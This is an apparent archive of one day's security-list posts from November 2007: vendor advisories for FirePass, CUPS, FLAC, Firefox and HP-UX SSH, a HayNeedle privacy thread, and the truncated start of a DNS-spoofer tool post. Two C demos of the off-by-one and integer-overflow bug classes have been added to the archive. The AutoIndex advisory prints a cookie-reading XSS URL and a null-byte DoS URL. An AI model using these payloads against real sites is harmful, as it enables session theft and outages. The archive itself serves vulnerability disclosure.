PR07-13: Cross-site Scripting / HTML injection on F5 FirePass 4100 SSL VPN 'download_plugin.php3' server-side script

2007-11-12 Thread research
Date Found: 19th June 2007


Successfully tested on: version 5.5.2


F5 Networks has confirmed the following versions to be vulnerable:


FirePass versions 5.4 - 5.5.2

FirePass versions 6.0 - 6.0.1


Description:


F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the "backurl" 
parameter processed by the "download_plugin.php3" server-side script.


No authentication is required to exploit this vulnerability.


Consequences:


An attacker may be able to cause execution of malicious scripting code in the 
browser of a user who visits a specially-crafted URL to an F5 Firepass device, 
or visits a malicious page that makes a request to such URL. Such code would 
run within the security context of the target domain.


This type of attack can result in non-persistent defacement of the target site, 
or the redirection of confidential information (i.e. admin session IDs) to 
unauthorised third parties. 


Severity: Medium/High


Credits: Jan Fry [jan.fry [at] procheckup.com] and Adrian Pastor [adrian.pastor 
[at] procheckup.com] of ProCheckUp Ltd 


Fix:


F5 Networks has issued SOL7498:

https://support.f5.com/kb/en-us/solutions/public/7000/400/sol7498.html 


More information, including proof of concept can be found on:

http://www.procheckup.com/Vulnerability_PR07-13.php


[ GLSA 200711-16 ] CUPS: Memory corruption

2007-11-12 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: CUPS: Memory corruption
  Date: November 12, 2007
  Bugs: #196736
ID: 200711-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


CUPS contains a boundary checking error that might lead to the
execution of arbitrary code.

Background
==

CUPS provides a portable printing layer for UNIX-based operating
systems.

Affected packages
=

---
 Package /   Vulnerable   / Unaffected
---
  1  net-print/cups  < 1.2.12-r2  >= 1.2.12-r2

Description
===

Alin Rad Pop (Secunia Research) discovered an off-by-one error in the
ippReadIO() function when handling Internet Printing Protocol (IPP)
tags that might allow one byte on the stack to be overwritten.

Impact
==

A local attacker could send a specially crafted IPP request containing
"textWithLanguage" or "nameWithLanguage" tags, leading to a Denial of
Service or the execution of arbitrary code with the privileges of the
"lp" user. If CUPS is configured to allow network printing, this
vulnerability might be remotely exploitable.

Workaround
==

To avoid remote exploitation, network access to CUPS servers on port
631/udp should be restricted. In order to do this, update the "Listen"
setting in cupsd.conf to "Listen localhost:631" or add a rule to the
system's firewall. However, this will not prevent local users from
exploiting this vulnerability.

Resolution
==

All CUPS users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-print/cups-1.2.12-r2"

References
==

  [ 1 ] CVE-2007-4351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4351

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHOMwLuhJ+ozIKI5gRAj2kAJ4nBFEivR9EjTpMWFgHR/urJr57WQCffDR7
JQt3M+r4ykECz1I05+c9C00=
=gIFU
-END PGP SIGNATURE-
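
The bug class this advisory describes, as an added illustration for this page (it is not CUPS code and does not reproduce the actual ippReadIO() defect; the buffer size, the off_by_one switch and the sample value are constructed for the demonstration). An IPP textWithLanguage or nameWithLanguage value is a language string followed by the text, each prefixed with a 2-byte length. A reader copies each string into a fixed stack buffer and NUL-terminates it; if the length test is `n > cap` instead of `n >= cap`, a string exactly `cap` bytes long passes and the terminator lands one byte past the buffer. Each buffer here carries a spare byte holding a canary so the overwrite can be observed without undefined behaviour:

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFCAP 8      /* tiny on purpose; real parsers use much larger stack buffers */
#define CANARY 0xAA   /* placed just past each buffer so a 1-byte overwrite is visible */

/* Read a 2-byte big-endian length and that many bytes (the shape of an IPP
 * string value) into out[cap], NUL-terminated.  Returns the number of input
 * bytes consumed, or -1 if the value is rejected.
 * off_by_one != 0 selects the buggy bound (n > cap): n == cap is accepted and
 * the NUL terminator is written to out[cap], one byte past the buffer. */
static int read_lenpfx(const uint8_t *in, size_t inlen,
                       char *out, size_t cap, int off_by_one)
{
    if (inlen < 2)
        return -1;
    size_t n = ((size_t)in[0] << 8) | in[1];
    if (inlen - 2 < n)
        return -1;                           /* truncated value */
    if (off_by_one ? (n > cap) : (n >= cap))
        return -1;                           /* no room for n bytes + NUL */
    memcpy(out, in + 2, n);
    out[n] = '\0';
    return (int)(2 + n);
}

/* textWithLanguage / nameWithLanguage (RFC 2910 section 3.9): a language
 * string followed by the text, each length-prefixed.  Each buffer has one
 * extra byte so the off-by-one lands on a canary we own rather than on the
 * stack frame: the parser is told the buffers are BUFCAP bytes long. */
struct textlang {
    uint8_t lang[BUFCAP + 1];
    uint8_t text[BUFCAP + 1];
};

/* Returns 0 on success, -1 if the value is rejected. */
static int parse_textlang(const uint8_t *v, size_t vlen,
                          struct textlang *t, int off_by_one)
{
    memset(t, CANARY, sizeof *t);
    int used = read_lenpfx(v, vlen, (char *)t->lang, BUFCAP, off_by_one);
    if (used < 0)
        return -1;
    int used2 = read_lenpfx(v + used, vlen - used, (char *)t->text, BUFCAP, off_by_one);
    if (used2 < 0)
        return -1;
    return (size_t)(used + used2) == vlen ? 0 : -1;   /* trailing bytes: reject */
}

/* Constructed sample value: language "en" followed by textlen 'A' bytes.
 * Returns 0 if the parser rejected it, 1 if it accepted it and both canaries
 * are intact, 2 if it accepted it and a canary was overwritten. */
static int demo(size_t textlen, int off_by_one)
{
    uint8_t v[6 + 64];
    if (textlen > 64)
        return -1;
    v[0] = 0; v[1] = 2; v[2] = 'e'; v[3] = 'n';            /* language "en" */
    v[4] = (uint8_t)(textlen >> 8); v[5] = (uint8_t)textlen;
    memset(v + 6, 'A', textlen);

    struct textlang t;
    if (parse_textlang(v, 6 + textlen, &t, off_by_one) != 0)
        return 0;
    return (t.lang[BUFCAP] != CANARY || t.text[BUFCAP] != CANARY) ? 2 : 1;
}

int main(void)
{
    printf("buggy bound, 8-byte text: %d (2 = byte past buffer overwritten)\n", demo(8, 1));
    printf("fixed bound, 8-byte text: %d (0 = rejected)\n", demo(8, 0));
    printf("fixed bound, 7-byte text: %d (1 = accepted, buffers intact)\n", demo(7, 0));
    return 0;
}
```

The strict bound is the whole fix: it keeps room for the terminator. The workaround in the advisory (binding cupsd to localhost or firewalling port 631) only limits who can reach the parser; a local user who can talk to cupsd still reaches it.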


[ MDKSA-2007:204-1 ] - Updated cups packages fix vulnerability

2007-11-12 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory   MDKSA-2007:204-1
 http://www.mandriva.com/security/
 ___
 
 Package : cups
 Date: November 12, 2007
 Affected: 2008.0
 ___
 
 Problem Description:
 
 Alin Rad Pop of Secunia Research discovered a vulnerability in CUPS
 that can be exploited by malicious individuals to execute arbitrary
 code.  This flaw is due to a boundary error when processing IPP
 (Internet Printing Protocol) tags.

 Update:

 Due to incorrect build requirements/conflicts, the cups-config
 in Mandriva Linux 2008.0 was displaying the full CFLAGS and libs
 instead of just the libraries when 'cups-config --libs' was invoked.
 This update corrects the cups-config behaviour.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4351
 ___
 
 Updated Packages:
 
 Mandriva Linux 2008.0:
 066d0553d0d41408d9f0b0d89b9299de  2008.0/i586/cups-1.3.0-3.2mdv2008.0.i586.rpm
 761125ca708cd22b2360e84f36674051  2008.0/i586/cups-common-1.3.0-3.2mdv2008.0.i586.rpm
 24a6797ad61c1ee82710480cba57c912  2008.0/i586/cups-serial-1.3.0-3.2mdv2008.0.i586.rpm
 2c6d558345461a1813ea8ffa9b93be4e  2008.0/i586/libcups2-1.3.0-3.2mdv2008.0.i586.rpm
 30bd123775b39ffd80e94d3232dbd5ce  2008.0/i586/libcups2-devel-1.3.0-3.2mdv2008.0.i586.rpm
 1d147d09513abcb5e556a02dcb4272aa  2008.0/i586/php-cups-1.3.0-3.2mdv2008.0.i586.rpm
 cfcb64cb2bc0af7b05c3770138a9311c  2008.0/SRPMS/cups-1.3.0-3.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 617534198402457ccce075bfc8341a2d  2008.0/x86_64/cups-1.3.0-3.2mdv2008.0.x86_64.rpm
 d7f56b65a853c2030ee85a5b9db1b800  2008.0/x86_64/cups-common-1.3.0-3.2mdv2008.0.x86_64.rpm
 48c4cd42cd19179ffeb003e1fed91f62  2008.0/x86_64/cups-serial-1.3.0-3.2mdv2008.0.x86_64.rpm
 2760af902f9937b89dfb836a07b373b2  2008.0/x86_64/lib64cups2-1.3.0-3.2mdv2008.0.x86_64.rpm
 a9cb35f7fa4cf7b55ef5730690b04aff  2008.0/x86_64/lib64cups2-devel-1.3.0-3.2mdv2008.0.x86_64.rpm
 7de4fe03981dbf79b9324e6e3fe244e4  2008.0/x86_64/php-cups-1.3.0-3.2mdv2008.0.x86_64.rpm
 cfcb64cb2bc0af7b05c3770138a9311c  2008.0/SRPMS/cups-1.3.0-3.2mdv2008.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHOKAumqjQ0CJFipgRAgfXAKCXXTmPhErJH4yPYSvJGYaC1ESFqACfUhpO
49ACWgewrpwKsu3pjlqBwbo=
=RPar
-END PGP SIGNATURE-



[ GLSA 200711-15 ] FLAC: Buffer overflow

2007-11-12 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: FLAC: Buffer overflow
  Date: November 12, 2007
  Bugs: #195700
ID: 200711-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple integer overflow vulnerabilities were found in FLAC possibly
allowing for the execution of arbitrary code.

Background
==

The Xiph.org Free Lossless Audio Codec (FLAC) library is the reference
implementation of the FLAC audio file format. It contains encoders and
decoders in library and executable form.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  media-libs/flac < 1.2.1-r1>= 1.2.1-r1

Description
===

Sean de Regge reported multiple integer overflows when processing FLAC
media files that could lead to improper memory allocations resulting in
heap-based buffer overflows.

Impact
==

A remote attacker could entice a user to open a specially crafted FLAC
file or network stream with an application using FLAC. This might lead
to the execution of arbitrary code with privileges of the user playing
the file.

Workaround
==

There is no known workaround at this time.

Resolution
==

All FLAC users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-libs/flac-1.2.1-r1"

You should also run revdep-rebuild to rebuild any packages that depend
on older versions of FLAC:

# revdep-rebuild --library=libFLAC.*

References
==

  [ 1 ] CVE-2007-4619
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4619

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-15.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHOMjJuhJ+ozIKI5gRAi72AJ4imCmGCJXwEj2aOLTpmaYJCYoOuACeK8Bk
alx8UWZK7VQfpRDTMVv+5HM=
=WEeV
-END PGP SIGNATURE-
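
The integer-overflow-into-undersized-allocation pattern this advisory describes, as an added example written for this page (it is not FLAC's own code; the sizes and sample bytes are constructed). A count or length taken from the file is multiplied by an element size, or has one added to it, in 32-bit arithmetic; if the result wraps, malloc returns a small block and the decoder's subsequent writes run off its end. The checked variants reject the value before allocating:

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The unchecked form: count and elem come from the stream, the product is
 * computed in 32 bits and wraps.  A following loop that stores `count`
 * elements then writes far past the end of the block malloc returned. */
static uint32_t naive_alloc_size(uint32_t count, uint32_t elem)
{
    return count * elem;                     /* wraps silently on overflow */
}

/* Checked form: refuse any count*elem that does not fit in 32 bits.
 * Returns 1 and stores the size, or 0 if the product would overflow. */
static int checked_alloc_size(uint32_t count, uint32_t elem, uint32_t *size)
{
    if (elem != 0 && count > UINT32_MAX / elem)
        return 0;
    *size = count * elem;
    return 1;
}

/* 1 if the unchecked computation requests fewer bytes than `count` elements
 * actually occupy (the precondition for the heap overflow), else 0. */
static int naive_underallocates(uint32_t count, uint32_t elem)
{
    uint64_t need = (uint64_t)count * elem;
    return naive_alloc_size(count, elem) < need;
}

/* A decoder step: reserve room for the sample count declared in a block
 * header, using the checked computation.  Returns NULL if rejected. */
static int32_t *alloc_samples(uint32_t count)
{
    uint32_t bytes;
    if (!checked_alloc_size(count, sizeof(int32_t), &bytes))
        return NULL;
    int32_t *p = malloc(bytes ? bytes : 1);
    if (p)
        memset(p, 0, bytes);
    return p;
}

/* 1 if `count` samples can be allocated under the checked rule, else 0. */
static int can_alloc_samples(uint32_t count)
{
    int32_t *p = alloc_samples(count);
    if (p == NULL)
        return 0;
    free(p);
    return 1;
}

/* The additive variant: a 32-bit big-endian length-prefixed string from a
 * metadata block, stored as a C string in len + 1 bytes.  Guards: len + 1
 * must not wrap, and len must not exceed what the block actually holds.
 * Returns a malloc'd string (caller frees) or NULL if rejected. */
static char *read_metadata_string(const uint8_t *blk, size_t blklen, size_t *consumed)
{
    if (blklen < 4)
        return NULL;
    uint32_t len = ((uint32_t)blk[0] << 24) | ((uint32_t)blk[1] << 16) |
                   ((uint32_t)blk[2] << 8) | blk[3];
    if (len == UINT32_MAX)
        return NULL;                         /* len + 1 would wrap to 0 on 32-bit */
    if (blklen - 4 < len)
        return NULL;                         /* declared length exceeds the block */
    char *s = malloc((size_t)len + 1);
    if (s == NULL)
        return NULL;
    memcpy(s, blk + 4, len);
    s[len] = '\0';
    *consumed = 4 + (size_t)len;
    return s;
}

/* Constructed sample blocks: a well-formed 5-byte string and one whose
 * declared length is 0xFFFFFFFF.  Returns 1 if the first yields "image"
 * and the second is rejected, else 0. */
static int demo_metadata(void)
{
    static const uint8_t good[] = {0, 0, 0, 5, 'i', 'm', 'a', 'g', 'e'};
    static const uint8_t bad[]  = {0xff, 0xff, 0xff, 0xff, 'x'};
    size_t used = 0;
    char *s = read_metadata_string(good, sizeof good, &used);
    int ok = s != NULL && strcmp(s, "image") == 0 && used == 9;
    free(s);
    return ok && read_metadata_string(bad, sizeof bad, &used) == NULL;
}

int main(void)
{
    printf("0x40000001 * 4 naive size: %u bytes, underallocates: %d\n",
           naive_alloc_size(0x40000001u, 4), naive_underallocates(0x40000001u, 4));
    printf("checked alloc of 0x40000001 samples accepted: %d\n", can_alloc_samples(0x40000001u));
    printf("metadata string demo ok: %d\n", demo_metadata());
    return 0;
}
```

The multiplicative check is written as `count > UINT32_MAX / elem` rather than testing the product afterwards, because the product has already wrapped by then; the same reasoning is why `len == UINT32_MAX` is tested before `len + 1` is formed.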


Re: Standing Up Against German Laws - Project HayNeedle

2007-11-12 Thread johan beisser


On Nov 12, 2007, at 11:27 AM, Matt D. Harris wrote:

> However some of these issues can be mitigated without too much
> trouble.  For example, one could have a dynamically growing
> dictionary of words to search for based on random words in random
> results pages that it grabs.  At the very least, this would kill
> any attempts to filter it out of the data mining system.

That'd be a significantly different approach. Even grabbing data from
the previously browsed cache would also work, as far as seeding the
dictionary goes.

> If the point of the system is primarily to create plausible
> deniability for the end-user, that is, to allow them to say
> "hayneedle hit the site, not me, so I am innocent", then I'd say it
> could be effective in that regard barring some proviso in the law
> that allows them to persecute someone who did not actually even
> visit a site of their own volition. Beyond that, it's also
> effective in terms of turning up the noise to signal ratio and
> making this law that much less effective, while placing a greater
> burden on ISPs who are then more likely to lobby against it ever
> more vigorously all while remaining entirely 'white area' in
> terms of functionality.

If I read the law correctly, it requires retention of "what IP
connected to another IP" and "which phone number called where." It
doesn't bother retaining the URL called (my German is rusty, so I may
be a little off in my interpretation). Connecting to a random IP on a
random open port (80 and 443, for example) would be a good start to
accomplishing the goal of creating chatter. The issue is that the search
terms to find those ports could lead to connecting to a site that
increases your profile against general background chatter, even as it
is raised with random connection traffic.

In that light, I'd regard use of something akin to TOR as a slightly
better solution for protecting privacy and filling up logs.

> I understand your post, but I don't think Mr. Ziegler was
> overselling his product's effectiveness beyond what it is really
> capable of.

I wasn't saying there was overselling of the effectiveness. I do think
the approach is innately flawed from a privacy standpoint.


[ GLSA 200711-14 ] Mozilla Firefox, SeaMonkey, XULRunner: Multiple vulnerabilities

2007-11-12 Thread Pierre-Yves Rofes
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Mozilla Firefox, SeaMonkey, XULRunner: Multiple
vulnerabilities
  Date: November 12, 2007
  Bugs: #196480
ID: 200711-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities have been discovered in Mozilla Firefox,
SeaMonkey and XULRunner, potentially allowing an attacker to compromise
a user's system.

Background
==

Mozilla Firefox is a cross-platform web browser from Mozilla. SeaMonkey
is a free, cross-platform Internet suite.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  www-client/mozilla-firefox  < 2.0.0.9  >= 2.0.0.9
  2  www-client/mozilla-firefox-bin  < 2.0.0.9  >= 2.0.0.9
  3  www-client/seamonkey < 1.1.6 >= 1.1.6
  4  www-client/seamonkey-bin < 1.1.6 >= 1.1.6
  5  net-libs/xulrunner  < 1.8.1.9  >= 1.8.1.9
---
 5 affected packages on all of their supported architectures.
---

Description
===

Multiple vulnerabilities have been reported in Mozilla Firefox and
SeaMonkey. Various errors in the browser engine and the Javascript
engine can be exploited to cause a memory corruption (CVE-2007-5339 and
CVE-2007-5340). Before being used in a request, input passed to the
user ID when making an HTTP request with digest authentication is not
properly sanitised (CVE-2007-2292). The titlebar can be hidden by a XUL
markup language document (CVE-2007-5334). Additionally, an error exists
in the handling of "smb:" and "sftp:" URI schemes on systems with
gnome-vfs support (CVE-2007-5337). An unspecified error in the handling
of "XPCNativeWrappers" and not properly implementing JavaScript
onUnload() handlers may allow the execution of arbitrary Javascript
code (CVE-2007-5338 and CVE-2007-1095). Another error is triggered by
using the addMicrosummaryGenerator sidebar method to access file: URIs
(CVE-2007-5335).

Impact
==

A remote attacker could exploit these issues to execute arbitrary code,
gain the privileges of the user running the application, disclose
sensitive information, conduct phishing attacks, and read and
manipulate certain data.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Mozilla Firefox users should upgrade to the latest version:

   # emerge --sync
   # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-2.0.0.9"

All Mozilla Firefox binary users should upgrade to the latest version:

   # emerge --sync
   # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-2.0.0.9"

All SeaMonkey users should upgrade to the latest version:

   # emerge --sync
   # emerge --ask --oneshot --verbose ">=www-client/seamonkey-1.1.6"

All SeaMonkey binary users should upgrade to the latest version:

   # emerge --sync
   # emerge --ask --oneshot --verbose ">=www-client/seamonkey-bin-1.1.6"

All XULRunner users should upgrade to the latest version:

   # emerge --sync
   # emerge --ask --oneshot --verbose ">=net-libs/xulrunner-1.8.1.9"

References
==

  [ 1 ] CVE-2007-1095
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1095
  [ 2 ] CVE-2007-2292
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2292
  [ 3 ] CVE-2007-5334
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5334
  [ 4 ] CVE-2007-5335
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5335
  [ 5 ] CVE-2007-5337
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5337
  [ 6 ] CVE-2007-5338
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5338
  [ 7 ] CVE-2007-5339
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5339
  [ 8 ] CVE-2007-5340
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5340

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-14.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or al

AutoIndex <= 2.2.2 Cross Site Scripting and Denial of Service

2007-11-12 Thread L4teral
==
AutoIndex <= 2.2.2 Cross Site Scripting and Denial of Service
==

Author:  L4teral 
Impact:  Cross Site Scripting
 Denial of Service (DoS)
Status:  patch available


--
Affected software description:
--

Application: AutoIndex
Version: <= 2.2.2/2.2.3
Vendor:  http://autoindex.sourceforge.net


--
Vulnerability:
--

1.
The variable $_SERVER['PHP_SELF'] is not properly sanitized
leading to cross site scripting.

2.
The use of unsanitized user input causes an error in the recursive
calculation of the size of a directory leading to cpu time/memory
consumption until the process gets killed.



PoC/Exploit:


1.
http:///AutoIndex/index.php/">alert(document.cookie)

2.
http:///AutoIndex/index.php?dir=%00


-
Solution:
-

update to version 2.2.4.


-
Timeline:
-

2007-11-05 - vendor informed
2007-11-05 - vendor released version 2.2.3 (fixing XSS)
2007-11-09 - vendor released version 2.2.4 (fixing DoS)
2007-11-12 - public disclosure


HPSBUX02287 SSRT071485 rev.1 - HP-UX Running HP Secure Shell, Remotely Gain Extended Privileges

2007-11-12 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01271085
Version: 1

HPSBUX02287 SSRT071485 rev.1 - HP-UX Running HP Secure Shell, Remotely Gain 
Extended Privileges

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2007-11-07
Last Updated: 2007-11-07

Potential Security Impact: Remotely gain extended privileges

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running HP 
Secure Shell. The vulnerability could be exploited remotely to gain extended 
privileges.

References: CVE-2007-4752

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running HP Secure Shell

BACKGROUND

To determine if an HP-UX system has an affected version, search the output of 
"swlist -a revision -l fileset" for one of the filesets listed below. 
For affected systems verify that the recommended action has been taken. 

AFFECTED VERSIONS 
HP-UX B.11.11 
== 
Secure_Shell.SECURE_SHELL 
action: install revision A.04.70.003 or subsequent 
URL: 
http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=T1471AA
 

HP-UX B.11.23 
== 
Secure_Shell.SECURE_SHELL 
action: install revision A.04.70.004 or subsequent 
URL: 
http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=T1471AA
 

HP-UX B.11.31 
== 
Secure_Shell.SECURE_SHELL 
action: install revision A.04.70.005 or subsequent 
URL: 
http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=T1471AA
 

END AFFECTED VERSIONS 

RESOLUTION
HP has provided the following software updates to resolve this vulnerability. 
The updates are available for download from: 
http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=T1471AA
 

OS Release 
 HP Secure Shell Version 
== 
HP-UX B.11.11 (11i v1)
 A.04.70.003 or subsequent
 
HP-UX B.11.23 (11i v2)
 A.04.70.004 or subsequent
 
HP-UX B.11.31 (11i v3)
 A.04.70.005 or subsequent
 ==

MANUAL ACTIONS: Yes - Update 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: 
HP-UX Software Assistant is an enhanced application that replaces HP-UX 
Security Patch Check. It analyzes all HP-issued Security Bulletins and lists 
recommended actions that may apply to a specific HP-UX system. It can also 
download patches and create a depot automatically. For more information see: 
https://www.hp.com/go/swa 

HISTORY: Version 1 (rev.1) - 07 November 2007 Initial Release 

Third Party Security Patches: 
Third party security patches which are to be installed on systems running HP 
software products should be applied in accordance with the customer's patch 
management policy. 



Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 
represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP p

RFID: Security Briefings

2007-11-12 Thread angelo
Hi,

I just published a presentation, that is an overview, about the RFID technology 
and the related security menaces. 

I hope it can be useful :-)

The presentation can be found at the following link: 

http://www.rosiello.org/archivio/rfid-angelo-rosiello.pdf


Thank you,


Angelo Rosiello

http://www.rosiello.org/


Re: Standing Up Against German Laws - Project HayNeedle

2007-11-12 Thread Matt D. Harris
However some of these issues can be mitigated without too much trouble.
For example, one could have a dynamically growing dictionary of words
to search for based on random words in random results pages that it
grabs.  At the very least, this would kill any attempts to filter it out
of the data mining system.

If the point of the system is primarily to create plausible deniability
for the end-user, that is, to allow them to say "hayneedle hit the site,
not me, so I am innocent", then I'd say it could be effective in that
regard barring some proviso in the law that allows them to persecute
someone who did not actually even visit a site of their own volition.
Beyond that, it's also effective in terms of turning up the noise to
signal ratio and making this law that much less effective, while placing
a greater burden on ISPs who are then more likely to lobby against it
ever more vigorously all while remaining entirely 'white area' in
terms of functionality.

I understand your post, but I don't think Mr. Ziegler was over-selling
his product's effectiveness beyond what it is really capable of.

Take care, Matt

johan beisser wrote:
> On Nov 10, 2007, at 9:28 AM, Paul Sebastian Ziegler wrote:
>
>> The mechanism is quite easy: It searches Google for random words and
>> picks random pages among the results, then spiders from there (well it
>> is spidering except that it only follows one URL at a time within a
>> session thus simulating a user).
>
> There are a few things wrong with this approach. Most of them were
> outlined by Bruce Schneier when he reviewed "TrackMeNot"[1] last year.
>
> The same issues with TrackMeNot apply to Hayneedle, including potential
> false positives, and a list of word combinations that can be filtered out
> easily, and well, the list goes on.
>
> [1] http://www.schneier.com/blog/archives/2006/08/trackmenot_1.html




--
/*
 * mdh - Solitox Networks (Lead Project Engineer)
 * Facts often matter little, in the face of fervently held perceptions
 */


Alice - dns spoofer

2007-11-12 Thread fabio
Hi lists, sorry for crossposting.

On the wave of spoofer2.pl, I've recoded that PoC in C and created a
nice Makefile. This tool creates spoofed DNS requests. If you set the
